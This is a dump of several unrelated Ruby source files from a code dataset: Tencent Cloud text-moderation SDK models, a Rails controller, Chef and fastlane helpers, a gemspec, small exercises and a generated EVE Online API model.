@Data = TipoffResponse.new
@Data.deserialize(params['Data'])
end
@RequestId = params['RequestId']
end
end
# DescribeTextLib请求参数结构体
class DescribeTextLibRequest < TencentCloud::Common::AbstractModel
# @param StrategyType: 内容类型 text: 1; image: 2; audio: 3; video: 4
# @type StrategyType: Integer
attr_accessor :StrategyType
def initialize(strategytype=nil)
@StrategyType = strategytype
end
def deserialize(params)
@StrategyType = params['StrategyType']
end
end
# DescribeTextLib返回参数结构体
class DescribeTextLibResponse < TencentCloud::Common::AbstractModel
# @param TextLib: 文本库id和name列表
# @type TextLib: Array
# @param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
# @type RequestId: String
attr_accessor :TextLib, :RequestId
def initialize(textlib=nil, requestid=nil)
@TextLib = textlib
@RequestId = requestid
end
def deserialize(params)
unless params['TextLib'].nil?
@TextLib = []
params['TextLib'].each do |i|
textlib_tmp = TextLib.new
textlib_tmp.deserialize(i)
@TextLib << textlib_tmp
end
end
@RequestId = params['RequestId']
end
end
# DescribeTextStat请求参数结构体
class DescribeTextStatRequest < TencentCloud::Common::AbstractModel
# @param AuditType: 审核类型 1: 机器审核; 2: 人工审核
# @type AuditType: Integer
# @param Filters: 查询条件
# @type Filters: Array
attr_accessor :AuditType, :Filters
def initialize(audittype=nil, filters=nil)
@AuditType = audittype
@Filters = filters
end
def deserialize(params)
@AuditType = params['AuditType']
unless params['Filters'].nil?
@Filters = []
params['Filters'].each do |i|
filters_tmp = Filters.new
filters_tmp.deserialize(i)
@Filters << filters_tmp
end
end
end
end
# DescribeTextStat返回参数结构体
class DescribeTextStatResponse < TencentCloud::Common::AbstractModel
# @param Overview: 识别结果统计
# @type Overview: :class:`Tencentcloud::Tms.v20200713.models.Overview`
# @param TrendCount: 识别量统计
# @type TrendCount: Array
# @param EvilCount: 违规数据分布
# 注意:此字段可能返回 null,表示取不到有效值。
# @type EvilCount: Array
# @param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
# @type RequestId: String
attr_accessor :Overview, :TrendCount, :EvilCount, :RequestId
def initialize(overview=nil, trendcount=nil, evilcount=nil, requestid=nil)
@Overview = overview
@TrendCount = trendcount
@EvilCount = evilcount
@RequestId = requestid
end
def deserialize(params)
unless params['Overview'].nil?
@Overview = Overview.new
@Overview.deserialize(params['Overview'])
end
unless params['TrendCount'].nil?
@TrendCount = []
params['TrendCount'].each do |i|
trendcount_tmp = TrendCount.new
trendcount_tmp.deserialize(i)
@TrendCount << trendcount_tmp
end
end
unless params['EvilCount'].nil?
@EvilCount = []
params['EvilCount'].each do |i|
evilcount_tmp = EvilCount.new
evilcount_tmp.deserialize(i)
@EvilCount << evilcount_tmp
end
end
@RequestId = params['RequestId']
end
end
# 文本返回的详细结果
class DetailResults < TencentCloud::Common::AbstractModel
# @param Label: 恶意标签,Normal:正常,Porn:色情,Abuse:谩骂,Ad:广告,Custom:自定义词库。
# 以及令人反感、不安全或不适宜的内容类型。
# @type Label: String
# @param Suggestion: 建议您拿到判断结果后的执行操作。
# 建议值,Block:建议屏蔽,Review:建议复审,Pass:建议通过
# 注意:此字段可能返回 null,表示取不到有效值。
# @type Suggestion: String
# @param Keywords: 该标签下命中的关键词
# 注意:此字段可能返回 null,表示取不到有效值。
# @type Keywords: Array
# @param Score: 该标签模型命中的分值
# 注意:此字段可能返回 null,表示取不到有效值。
# @type Score: Integer
# @param LibType: 仅当Label为Custom自定义关键词时有效,表示自定义关键词库类型,1:黑白库,2:自定义库
# 注意:此字段可能返回 null,表示取不到有效值。
# @type LibType: Integer
# @param LibId: 仅当Label为Custom自定义关键词时有效,表示自定义库id
# 注意:此字段可能返回 null,表示取不到有效值。
# @type LibId: String
# @param LibName: 仅当Labe为Custom自定义关键词时有效,表示自定义库名称
# 注意:此字段可能返回 null,表示取不到有效值。
# @type LibName: String
attr_accessor :Label, :Suggestion, :Keywords, :Score, :LibType, :LibId, :LibName
def initialize(label=nil, suggestion=nil, keywords=nil, score=nil, libtype=nil, libid=nil, libname=nil)
@Label = label
@Suggestion = suggestion
@Keywords = keywords
@Score = score
@LibType = libtype
@LibId = libid
@LibName = libname
end
def deserialize(params)
@Label = params['Label']
@Suggestion = params['Suggestion']
@Keywords = params['Keywords']
@Score = params['Score']
@LibType = params['LibType']
@LibId = params['LibId']
@LibName = params['LibName']
end
end
# 设备信息
class Device < TencentCloud::Common::AbstractModel
# @param IP: 用户IP
# @type IP: String
# @param Mac: Mac地址
# @type Mac: String
# @param TokenId: 设备指纹Token
# @type TokenId: String
# @param DeviceId: 设备指纹ID
# @type DeviceId: String
# @param IMEI: 设备序列号
# @type IMEI: String
# @param IDFA: IOS设备,Identifier For Advertising(广告标识符)
# @type IDFA: String
# @param IDFV: IOS设备,IDFV - Identifier For Vendor(应用开发商标识符)
# @type IDFV: String
attr_accessor :IP, :Mac, :TokenId, :DeviceId, :IMEI, :IDFA, :IDFV
def initialize(ip=nil, mac=nil, tokenid=nil, deviceid=nil, imei=nil, idfa=nil, idfv=nil)
@IP = ip
@Mac = mac
@TokenId = tokenid
@DeviceId = deviceid
@IMEI = imei
@IDFA = idfa
@IDFV = idfv
end
def deserialize(params)
@IP = params['IP']
@Mac = params['Mac']
@TokenId = params['TokenId']
@DeviceId = params['DeviceId']
@IMEI = params['IMEI']
@IDFA = params['IDFA']
@IDFV = params['IDFV']
end
end
# 违规数据分布
class EvilCount < TencentCloud::Common::AbstractModel
# @param EvilType: ----非必选,该参数功能暂未对外开放
# @type EvilType: String
# @param Count: 分布类型总量
# @type Count: Integer
attr_accessor :EvilType, :Count
def initialize(eviltype=nil, count=nil)
@EvilType = eviltype
@Count = count
end
def deserialize(params)
@EvilType = params['EvilType']
@Count = params['Count']
end
end
# 文本过滤条件
class Filters < TencentCloud::Common::AbstractModel
# @param Name: 查询字段:
# 策略BizType
# 子账号SubUin
# 日期区间DateRange
# @type Name: String
# @param Values: 查询值
# @type Values: Array
attr_accessor :Name, :Values
def initialize(name=nil, values=nil)
@Name = name
@Values = values
end
def deserialize(params)
@Name = params['Name']
@Values = params['Values']
end
end
# 识别结果统计
class Overview < TencentCloud::Common::AbstractModel
# @param TotalCount: 总调用量
# @type TotalCount: Integer
# @param TotalHour: 总调用时长
# @type TotalHour: Integer
# @param PassCount: 通过量
# @type PassCount: Integer
# @param PassHour: 通过时长
# @type PassHour: Integer
# @param EvilCount: 违规量
# @type EvilCount: Integer
# @param EvilHour: 违规时长
# @type EvilHour: Integer
# @param SuspectCount: 疑似违规量
# @type SuspectCount: Integer
# @param SuspectHour: 疑似违规时长
# @type SuspectHour: Integer
attr_accessor :TotalCount, :TotalHour, :PassCount, :PassHour, :EvilCount, :EvilHour, :SuspectCount, :SuspectHour
def initialize(totalcount=nil, totalhour=nil, passcount=nil, passhour=nil, evilcount=nil, evilhour=nil, suspectcount=nil, suspecthour=nil)
@TotalCount = totalcount
@TotalHour = totalhour
@PassCount = passcount
@PassHour = passhour
@EvilCount = evilcount
@EvilHour = evilhour
@SuspectCount = suspectcount
@SuspectHour = suspecthour
end
def deserialize(params)
@TotalCount = params['TotalCount']
@TotalHour = params['TotalHour']
@PassCount = params['PassCount']
@PassHour = params['PassHour']
@EvilCount = params['EvilCount']
@EvilHour = params['EvilHour']
@SuspectCount = params['SuspectCount']
@SuspectHour = params['SuspectHour']
end
end
# 账号风险检测结果
class RiskDetails < TencentCloud::Common::AbstractModel
# @param Label: 风险类别,RiskAccount,RiskIP, RiskIMEI
# @type Label: String
# @param Level: 风险等级,1:疑似,2:恶意
# @type Level: Integer
attr_accessor :Label, :Level
def initialize(label=nil, level=nil)
@Label = label
@Level = level
end
def deserialize(params)
@Label = params['Label']
@Level = params['Level']
end
end
# 自定义库列表
class TextLib < TencentCloud::Common::AbstractModel
# @param LibId: 库id
# @type LibId: Integer
# @param LibName: 库名
# @type LibName: String
attr_accessor :LibId, :LibName
def initialize(libid=nil, libname=nil)
@LibId = libid
@LibName = libname
end
def deserialize(params)
@LibId = params['LibId']
@LibName = params['LibName']
end
end
# TextModeration请求参数结构体
class TextModerationRequest < TencentCloud::Common::AbstractModel
# @param Content: 文本内容Base64编码。限制原文长度不能超过10000个unicode字符
# @type Content: String
# @param BizType: 该字段用于标识业务场景。您可以在内容安全控制台创建对应的ID,配置不同的内容审核策略,通过接口调用,默认不填为0,后端使用默认策略
# @type BizType: String
# @param DataId: 数据ID,英文字母、下划线、-组成,不超过64个字符
# @type DataId: String
# @param User: 账号相关信息字段,填入后可识别违规风险账号
# @type User: :class:`Tencentcloud::Tms.v20200713.models.User`
# @param Device: 设备相关信息字段,填入后可识别违规风险设备
# @type Device: :class:`Tencentcloud::Tms.v20200713.models.Device`
attr_accessor :Content, :BizType, :DataId, :User, :Device
def initialize(content=nil, biztype=nil, dataid=nil, user=nil, device=nil)
@Content = content
@BizType = biztype
@DataId = dataid
@User = user
@Device = device
end
def deserialize(params)
@Content = params['Content']
@BizType = params['BizType']
@DataId = params['DataId']
unless params['User'].nil?
@User = User.new
@User.deserialize(params['User'])
end
unless params['Device'].nil?
@Device = Device.new
@Device.deserialize(params['Device'])
end
end
end
# TextModeration返回参数结构体
class TextModerationResponse < TencentCloud::Common::AbstractModel
# @param BizType: 您在入参时所填入的Biztype参数
# @type BizType: String
# @param EvilFlag: 数据是否属于恶意类型,0:正常 1:可疑
# @type EvilFlag: Integer
# @param Label: 恶意标签,Normal:正常,Porn:色情,Abuse:谩骂,Ad:广告,Custom:自定义词库,以及令人反感、不安全或不适宜的内容类型
# @type Label: String
# @param Suggestion: 建议您拿到判断结果后的执行操作
# 建议值,Block:建议屏蔽,Review:建议复审,Pass:建议通过
# @type Suggestion: String
# @param Keywords: 文本命中的关键词信息,用于提示您文本违规的具体原因,可能会返回多个命中的关键词。(如:加我微信)
# 如返回值为空,Score不为空,即识别结果(Label)是来自于语义模型判断的返回值
# 注意:此字段可能返回 null,表示取不到有效值。
# @type Keywords: Array
# @param Score: 机器判断当前分类的置信度,取值范围:0.00~100.00。分数越高,表示越有可能属于当前分类。
# (如:色情 99.99,则该样本属于色情的置信度非常高。)
# @type Score: Integer
# @param DetailResults: 接口识别样本后返回的详细结果
# 注意:此字段可能返回 null,表示取不到有效值。
# @type DetailResults: Array
# @param RiskDetails: 接口识别样本中存在违规账号风险的检测结果
# 注意:此字段可能返回 null,表示取不到有效值。
# @type RiskDetails: Array
# @param Extra: 扩展字段,用于特定信息返回,不同客户/Biztype下返回信息不同
# 注意:此字段可能返回 null,表示取不到有效值。
# @type Extra: String
# @param DataId: 请求参数中的DataId
# 注意:此字段可能返回 null,表示取不到有效值。
# @type DataId: String
# @param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
# @type RequestId: String
attr_accessor :BizType, :EvilFlag, :Label, :Suggestion, :Keywords, :Score, :DetailResults, :RiskDetails, :Extra, :DataId, :RequestId
def initialize(biztype=nil, evilflag=nil, label=nil, suggestion=nil, keywords=nil, score=nil, detailresults=nil, riskdetails=nil, extra=nil, dataid=nil, requestid=nil)
@BizType = biztype
@EvilFlag = evilflag
@Label = label
@Suggestion = suggestion
@Keywords = keywords
@Score = score
@DetailResults = detailresults
@RiskDetails = riskdetails
@Extra = extra
@DataId = dataid
@RequestId = requestid
end
def deserialize(params)
@BizType = params['BizType']
@EvilFlag = params['EvilFlag']
@Label = params['Label']
@Suggestion = params['Suggestion']
@Keywords = params['Keywords']
@Score = params['Score']
unless params['DetailResults'].nil?
@DetailResults = []
params['DetailResults'].each do |i|
detailresults_tmp = DetailResults.new
detailresults_tmp.deserialize(i)
@DetailResults << detailresults_tmp
end
end
unless params['RiskDetails'].nil?
@RiskDetails = []
params['RiskDetails'].each do |i|
riskdetails_tmp = RiskDetails.new
riskdetails_tmp.deserialize(i)
@RiskDetails << riskdetails_tmp
end
end
@Extra = params['Extra']
@DataId = params['DataId']
@RequestId = params['RequestId']
end
end
# 举报接口响应数据
class TipoffResponse < TencentCloud::Common::AbstractModel
# @param ResultCode: 举报结果, "0-举报数据提交成功 99-举报数据提交失败"
# @type ResultCode: Integer
# @param ResultMsg: 结果描述
# @type ResultMsg: String
attr_accessor :ResultCode, :ResultMsg
def initialize(resultcode=nil, resultmsg=nil)
@ResultCode = resultcode
@ResultMsg = resultmsg
end
def deserialize(params)
@ResultCode = params['ResultCode']
@ResultMsg = params['ResultMsg']
end
end
# 识别量统计
class TrendCount < TencentCloud::Common::AbstractModel
# @param TotalCount: 总调用量
# 注意:此字段可能返回 null,表示取不到有效值。
# @type TotalCount: Integer
# @param TotalHour: 总调用时长
# 注意:此字段可能返回 null,表示取不到有效值。
# @type TotalHour: Integer
# @param PassCount: 通过量
# 注意:此字段可能返回 null,表示取不到有效值。
# @type PassCount: Integer
# @param PassHour: 通过时长
# 注意:此字段可能返回 null,表示取不到有效值。
# @type PassHour: Integer
# @param EvilCount: 违规量
# 注意:此字段可能返回 null,表示取不到有效值。
# @type EvilCount: Integer
# @param EvilHour: 违规时长
# 注意:此字段可能返回 null,表示取不到有效值。
# @type EvilHour: Integer
# @param SuspectCount: 疑似违规量
# 注意:此字段可能返回 null,表示取不到有效值。
# @type SuspectCount: Integer
# @param SuspectHour: 疑似违规时长
# 注意:此字段可能返回 null,表示取不到有效值。
# @type SuspectHour: Integer
# @param Date: 日期
# 注意:此字段可能返回 null,表示取不到有效值。
# @type Date: String
attr_accessor :TotalCount, :TotalHour, :PassCount, :PassHour, :EvilCount, :EvilHour, :SuspectCount, :SuspectHour, :Date
def initialize(totalcount=nil, totalhour=nil, passcount=nil, passhour=nil, evilcount=nil, evilhour=nil, suspectcount=nil, suspecthour=nil, date=nil)
@TotalCount = totalcount
@TotalHour = totalhour
@PassCount = passcount
@PassHour = passhour
@EvilCount = evilcount
@EvilHour = evilhour
@SuspectCount = suspectcount
@SuspectHour = suspecthour
@Date = date
end
def deserialize(params)
@TotalCount = params['TotalCount']
@TotalHour = params['TotalHour']
@PassCount = params['PassCount']
@PassHour = params['PassHour']
@EvilCount = params['EvilCount']
@EvilHour = params['EvilHour']
@SuspectCount = params['SuspectCount']
@SuspectHour = params['SuspectHour']
@Date = params['Date']
end
end
# 用户相关信息
class User < TencentCloud::Common::AbstractModel
# @param UserId: 用户账号ID,如填写,会根据账号历史恶意情况,判定消息有害结果,特别是有利于可疑恶意情况下的辅助判断。账号可以填写微信uin、QQ号、微信openid、QQopenid、字符串等。该字段和账号类别确定唯一账号。
# @type UserId: String
# @param Nickname: 用户昵称
# @type Nickname: String
# @param AccountType: 账号类别,"1-微信uin 2-QQ号 3-微信群uin 4-qq群号 5-微信openid 6-QQopenid 7-其它string"
# @type AccountType: Integer
# @param Gender: 性别 默认0 未知 1 男性 2 女性
# @type Gender: Integer
# @param Age: 年龄 默认0 未知
# @type Age: Integer
# @param Level: 用户等级,默认0 未知 1 低 2 中 3 高
# @type Level: Integer
# @param Phone: 手机号
# @type Phone: String
attr_accessor :UserId, :Nickname, :AccountType, :Gender, :Age, :Level, :Phone
def initialize(userid=nil, nickname=nil, accounttype=nil, gender=nil, age=nil, level=nil, phone=nil)
@UserId = userid
@Nickname = nickname
@AccountType = accounttype
@Gender = gender
@Age = age
@Level = level
@Phone = phone
end
def deserialize(params)
@UserId = params['UserId']
@Nickname = params['Nickname']
@AccountType = params['AccountType']
@Gender = params['Gender']
@Age = params['Age']
@Level = params['Level']
@Phone = params['Phone']
end
end
end
end
end
| 34.035276 | 175 | 0.585643 |
398e1d2462e76451a4245192e49f3b85727bf229 | 2,767 | class Courses::CourseDetailController < ApplicationController
def index
puts "ec- In CourseDetailController -index"
puts ("#{params[:course_id]}")
@coursedetail = CourseDetail.where(course_id: params[:course_id])
respond_to do |format|
format.html {render :index} #
format.json {render json: @coursedetail }
end
end
def edit
puts "ec- In CourseDetailController -edit"
@course_detail = CourseDetail.find(params[:id])
end
def new
@course_detail = CourseDetail.new
end
def at_risk
CourseDetail.at_risk_students
end
#RAILS PROJECT CODE
# def create
# puts "ec- In CourseDetailController -create"
# @course_detail = CourseDetail.new(course_detail_params)
# if @course_detail.save
# flash[:notice] = "Record successfully added."
# redirect_to course_course_details_path("#{params[:course_id]}")
# else
# flash[:error] = "Record not added. Please try again."
# puts "Errors are #{@course_detail.errors.any?}"
# @course_detail.errors.full_messages.each do |msg|
# puts msg
# end
# render :new
#
# end
# end
# JAVASCRIPT / RAILS PROJECT CODE
def create
puts "ec- In CourseDetailController -create"
@course_detail = CourseDetail.new(course_detail_params)
if @course_detail.save
flash[:notice] = "Record successfully added."
# redirect_to course_course_details_path("#{params[:course_id]}")
render json: @course_detail, status: 201
else
#render json: @course_detail, status: 406
flash[:error] = "Record not added. Please try again."
puts "Errors are #{@course_detail.errors.any?}"
@course_detail.errors.full_messages.each do |msg|
puts msg
end
render :new
end
end
def show
puts "ec- In CourseDetailController -show"
@acoursedetail = CourseDetail.where(course_id: params[:id])
respond_to do |format|
format.html {render :index} #
format.json {render json: @acoursedetail }
end
end
def update
@course_detail = CourseDetail.find(params[:id])
if @course_detail.update(course_detail_params)
flash[:notice] = "Record successfully updated."
else
flash[:notice] = "Record not updated. Please try again."
end
render :edit
end
def destroy
@course_detail = CourseDetail.find(params[:id])
@course_detail.delete
flash[:notice] = "Record successfully deleted."
redirect_to course_course_details_path("#{params[:course_id]}")
end
## PRIVATE METHODS
private
def course_detail_params
params.require(:course_detail).permit(:student_id, :teacher_id, :course_id, :assignment_name, :assignment_grade)
end
end
| 25.154545 | 116 | 0.666064 |
3310a118cfd9447b5ed952ac7c2df3968fdc4f7e | 275 | # frozen_string_literal: true
class BlogEntry < ApplicationRecord
self.table_name = :blog_entries
belongs_to :blog
has_many :images, dependent: :restrict_with_error
validates :blog_id, :title, :text, presence: true
validates :blog, presence: { if: :blog_id }
end
| 25 | 51 | 0.756364 |
1c1f4efe3d5dfd32f4084e4c40b51e41d326fa8e | 1,360 | module Ark
class UnzipCommandBuilder
def unpack
if resource.strip_components > 0
unzip_with_strip_components
else
"unzip -q -o #{resource.release_file} -d #{resource.path}"
end
end
def dump
"unzip -j -q -o \"#{resource.release_file}\" -d \"#{resource.path}\""
end
# rubocop:disable Metrics/AbcSize
def cherry_pick
cmd = "unzip -t #{resource.release_file} \"*/#{resource.creates}\" ; stat=$? ;"
cmd += "if [ $stat -eq 11 ] ; then "
cmd += "unzip -j -o #{resource.release_file} \"#{resource.creates}\" -d #{resource.path} ;"
cmd += "elif [ $stat -ne 0 ] ; then false ;"
cmd += "else "
cmd += "unzip -j -o #{resource.release_file} \"*/#{resource.creates}\" -d #{resource.path} ;"
cmd += "fi"
cmd
end
# rubocop:enable Metrics/AbcSize
def initialize(resource)
@resource = resource
end
private
attr_reader :resource
def unzip_with_strip_components
tmpdir = make_temp_directory
strip_dir = '*/' * resource.strip_components
cmd = "unzip -q -o #{resource.release_file} -d #{tmpdir}"
cmd += " && rsync -a #{tmpdir}/#{strip_dir} #{resource.path}"
cmd += " && rm -rf #{tmpdir}"
cmd
end
def make_temp_directory
require 'tmpdir'
Dir.mktmpdir
end
end
end
| 26.666667 | 100 | 0.580147 |
2136b588b00f0ba40bf81e427116a24dedec48c0 | 4,713 | module Fastlane
module Actions
class GetInfoPlistPathAction < Action
require 'xcodeproj'
require 'pathname'
def self.run(params)
unless params[:xcodeproj]
if Helper.test?
params[:xcodeproj] = "/tmp/fastlane/tests/fastlane/bundle.xcodeproj"
else
params[:xcodeproj] = Dir["*.xcodeproj"][0] unless params[:xcodeproj]
end
end
if params[:target] then
path = find_path_using_target(params)
else
path = find_path_using_scheme(params)
end
path
end
def self.find_path_using_target(params)
project = Xcodeproj::Project.open(params[:xcodeproj])
if params[:target]
target = project.targets.detect { |t| t.name == params[:target]}
else
# firstly we are trying to find modern application target
target = project.targets.detect do |t|
t.kind_of?(Xcodeproj::Project::Object::PBXNativeTarget) &&
t.product_type == 'com.apple.product-type.application'
end
target = project.targets[0] if target.nil?
end
if params[:build_configuration_name]
build_settings = target.build_settings(params[:build_configuration_name])
plist = build_settings['INFOPLIST_FILE']
else
begin
plist = target.common_resolved_build_setting('INFOPLIST_FILE')
rescue
UI.user_error! 'Cannot resolve Info.plist build setting. Maybe you should specify :build_configuration_name?'
end
end
path = plist.gsub('$(SRCROOT)', project.path.parent.to_path)
path = path.gsub('${SRCROOT}', project.path.parent.to_path)
unless (Pathname.new path).absolute?
path = File.join(project.path.parent.to_path, path)
end
path
end
def self.find_path_using_scheme(params)
config = {project: params[:xcodeproj], scheme: params[:scheme], configuration: params[:build_configuration_name]}
project = FastlaneCore::Project.new(config)
project.select_scheme
path = project.build_settings(key: 'INFOPLIST_FILE')
unless (Pathname.new path).absolute?
path = File.join(Pathname.new(project.path).parent.to_path, path)
end
path
end
#####################################################
# @!group Documentation
#####################################################
def self.description
"Get the version number of your project"
end
def self.details
[
"This action will return path to Info.plist for specific target in your project."
].join(' ')
end
def self.available_options
[
FastlaneCore::ConfigItem.new(key: :xcodeproj,
env_name: "FL_INFO_PLIST_PROJECT",
description: "optional, you must specify the path to your main Xcode project if it is not in the project root directory or if you have multiple *.xcodeproj's in the root directory",
optional: true,
verify_block: proc do |value|
UI.user_error!("Please pass the path to the project, not the workspace") if value.end_with? ".xcworkspace"
UI.user_error!("Could not find Xcode project at path '#{File.expand_path(value)}'") if !File.exist?(value) and !Helper.is_test?
end),
FastlaneCore::ConfigItem.new(key: :target,
env_name: "FL_INFO_PLIST_TARGET",
optional: true,
conflicting_options: [:scheme],
description: "Specify a specific target if you have multiple per project, optional"),
FastlaneCore::ConfigItem.new(key: :scheme,
env_name: "FL_INFO_PLIST_SCHEME",
optional: true,
conflicting_options: [:target],
description: "Specify a specific scheme if you have multiple per project, optional"),
FastlaneCore::ConfigItem.new(key: :build_configuration_name,
optional: true,
description: "Specify a specific build configuration if you have different Info.plist build settings for each configuration")
]
end
def self.authors
["SiarheiFedartsou"]
end
def self.is_supported?(platform)
[:ios, :mac].include? platform
end
end
end
end
| 39.275 | 210 | 0.565457 |
1ac6f9361da97e707d9213833890335ea42434d3 | 534 | class SelectionHandler
attr_accessor :next_selection_handler, :previous_selection_handler
def handle_input
input = gets.downcase
if input.is_a? Integer
#all methods for selecting search parameters will return integers;
#it is up to the methods themselves to discern whether or not the
#input is within range of the size of the lists of parameters
#to choose from
else
#a valid command has not been chosen
puts "Invalid input."
display_commands
handle_input
end
end
| 29.666667 | 72 | 0.719101 |
084f56a2b8709a9680b2ceba00baf9a90907f413 | 764 | def staircase(n)
to_return = {}
1.upto n do |crnt_size|
next if crnt_size.even?
all = Array.new(crnt_size) { |i| i + 1 }
evens = all.select { |i| i.even? }
to_return[crnt_size] = evens
end
to_return
end
#================================
#paul fitz & meads
def staircase(n)
answer = Hash.new
evens = []
odds = []
1.upto(n) do |x| #0 is even
evens << x if x.even?
odds << x if x.odd?
end
odds.each do |x|
answer[x] = evens.select do |y|
y if y < x
end
end
end
#Sebastien
def staircase(number)
newHash = Hash.new { |hash, key| hash[key] =[] }
(1..number).each do |x|
newHash.delete_if{|key, val| key.even?}
if x.odd?
newHash[x] = (1..x).step(1).to_a.select { |e| e.even? }
end
end
return newHash
end
| 17.767442 | 58 | 0.566754 |
7a454d292d0e27a32dd090565cad1f3c2da5b92e | 61 | require "sc4ry/version"
require "sc4ry/dependencies"
| 5.545455 | 28 | 0.704918 |
e86c3b591cc496682625192e9e841a257c6e4940 | 1,747 | #
# The MIT License (MIT)
#
# Copyright (c) 2014 Wynand Pieterse
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Version 0.1.0
#
require 'open-uri'
require 'yaml'
# Regenerate the CoreOS cluster token if the system is brought up on Vagrant.
def setUpCoreOSClusterToken
generatedCoreFile = "generated/files/LocalUserData.yml"
baseCoreFile = "configuration/coreos/LocalUserData.yml"
if ARGV[0].eql?('up')
token = open('https://discovery.etcd.io/new').read
data = YAML.load(IO.readlines(baseCoreFile)[1..-1].join)
data['coreos']['etcd']['discovery'] = token
yaml = YAML.dump(data)
File.open(generatedCoreFile, 'w') { |file| file.write("#{yaml}") }
return generatedCoreFile
else
return baseCoreFile
end
end | 35.653061 | 80 | 0.752147 |
5d846fa29a449b3ccbea3cfb7b75397b346ef824 | 1,622 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'tensor_stream/version'
Gem::Specification.new do |spec|
spec.name = "tensor_stream"
spec.version = TensorStream::VERSION
spec.authors = ["Joseph Emmanuel Dayo"]
spec.email = ["[email protected]"]
spec.summary = %q{High Performance Machine Learning for Ruby}
spec.description = %q{High Performance Machine Learning for Ruby}
spec.homepage = "http://www.github.com/jedld/tensor_stream"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "http://rubygems.org"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.14"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
spec.add_development_dependency "awesome_print"
spec.add_development_dependency "pry-byebug"
spec.add_development_dependency "rubocop"
spec.add_dependency "deep_merge"
spec.add_dependency "concurrent-ruby"
end
| 38.619048 | 96 | 0.692972 |
798becc54cf9efd3c47faad7ce034d0925794b20 | 155 | require 'spec_helper'
module Credere
describe Asset do
it_behaves_like 'a Credere::Account subtype', kind: :asset, normal_balance: :debit
end
end
| 19.375 | 86 | 0.754839 |
7a5d4dc6dddb56c21bb7c323429d88d268fbb140 | 5,215 | =begin
#EVE Swagger Interface
#An OpenAPI for EVE Online
OpenAPI spec version: 1.2.9
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.12
=end
require 'date'
module EVEOpenAPI
# Unprocessable entity
class GetWarsWarIdKillmailsUnprocessableEntity
# Unprocessable entity message
attr_accessor :error
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'error' => :'error'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'error' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'error')
self.error = attributes[:'error']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
error == o.error
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[error].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = EVEOpenAPI.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
